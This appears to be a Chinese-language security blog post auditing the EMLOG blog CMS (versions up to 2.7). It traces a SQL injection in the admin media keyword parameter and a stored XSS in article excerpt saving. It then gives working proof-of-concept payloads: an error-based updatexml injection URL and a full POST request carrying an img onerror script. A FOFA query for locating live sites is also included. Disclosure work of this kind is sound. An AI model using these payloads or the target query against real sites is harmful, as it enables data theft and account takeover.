【代码审计】Emlog存在SQL注入+XSS漏洞

发布于 作者:

【代码审计】Emlog存在SQL注入+XSS漏洞

实战安全研究 2025-04-27 02:00

使

1.源码简介

EMLOG 是一款轻量级开源博客和CMS建站系统,速度快、省资源、易上手,适合各种规模的站点搭建。

2.漏洞描述

EMLOG $keyword参数存在SQL注入漏洞。

EMLOG article.php文件active_post参数存在XSS漏洞

2.影响范围

EMLOG <=2.7版本

FOFA: 

App="EMLOG"&&is_domain=true&&country="CN"

危害级别:高

3.代码审计过程

一、SQL注入漏洞分析过程

1、首先打开emlog_pro_2.5.7\admin\media.php文件,$keyword参数由此传入。在
media.php中,
keyword参数通过
Input::getStrVar(‘keyword’)获取。

如下图:

2、接着,这个参数被传递到
Media_Model的
getMedias和
getMediaCount方法中如下图

3、在Media_Model类的getMedias方法里,构造SQL查询时,直接使用了$keyword变量,并将其拼接到SQL语句中。具体代码行是:emlog_pro_2.5.7\include\model\media_model.php第29行,如图

4、这里明显没有对$keyword进行任何过滤或转义处理,直接将其插入到SQL语句中。

二、XSS
分析过程
1、漏洞点在emlog_pro_2.5.7\admin\articel_save.php文件,第45-50行。当$auto_excerpt为’y’时,代码使用Parsedown解析Markdown内容生成HTML摘要。若原始内容包含恶意HTML(如),转换后的HTML会被直接存储。若前端未转义摘要内容,将触发XSS。

2、跟进extractHtmlData方法未作相关过滤

3、接着$excerpt,赋值给$logData

4、最后在articel_save.php文件,第89行通过doMultiAction保存

5、跟进doMultiAction,通过钩子直接保存数据

综上若原始内容包含恶意HTML(如),转换后的HTML会被直接存储。若前端未转义摘要内容,将触发XSS。
4. 搭建环境进行验证:
Apache
.
2
.
4.39

MySql5.7.26

P
hp5.6.9

安装:
先在msyql创建emlog数据库再访问web安装即可

1、sql注入验证:

http://127.0.0.1:8099/index.php?keyword=%2527%20AND%20updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)%20%20--%2520

2、xss验证: 

POST /emlog_pro_2.5.7/admin/article_save.php HTTP/1.1
Host: 192.168.17.103
Content-Length: 1796
Cache-Control: max-age=0
Origin: http://192.168.17.103
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7dLxxHHoddxnJMVB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.17.103/emlog_pro_2.5.7/admin/article.php?action=edit&gid=2
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1744352762; tw_comment_author=1; tk_ai=1%2BA2fri83NiO%2FIPjMIdteEBR; PHPSESSID=24fggvmjq26us7riv236npp743; EM_AUTHCOOKIE_O5MScKeTFAaXFCEtXoNG5gLYyH9s5X4Y=admin%7C0%7Cd6687300a74ea0f8afb2e7164704c7cb; em_saveLastTime=1745478698706
Connection: keep-alive
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="title"
111
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="logcontent"
body"><img src="xss" onerror="alert(/111111111111111/)">
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="logexcerpt"
1111
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="ishide"
n
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="as_logid"
2
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="gid"
2
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="author"
1
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="cover"
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="upload_img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="sort"
-1
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="tag"
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="postdate"
2025-04-24 14:37:07
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="allow_remark"
y
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="alias"
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="link"
------WebKitFormBoundary7dLxxHHoddxnJMVB
Content-Disposition: form-data; name="password"
------WebKitFormBoundary7dLxxHHoddxnJMVB--

5. nuclei检测脚本:

公众号回复Emlog获取检测脚本和源代码

6.修复建议

建议使用专门的 Web 应用程序防火墙(WAF)来检测和防止 SQL 注入攻击。WAF 可以提供更强大的安全性,包括自定义规则、恶意模式检测和更高级的防护。

nuclei检测

公众号回

Emlog获取检测脚本和源代码

最后知识星球上线啦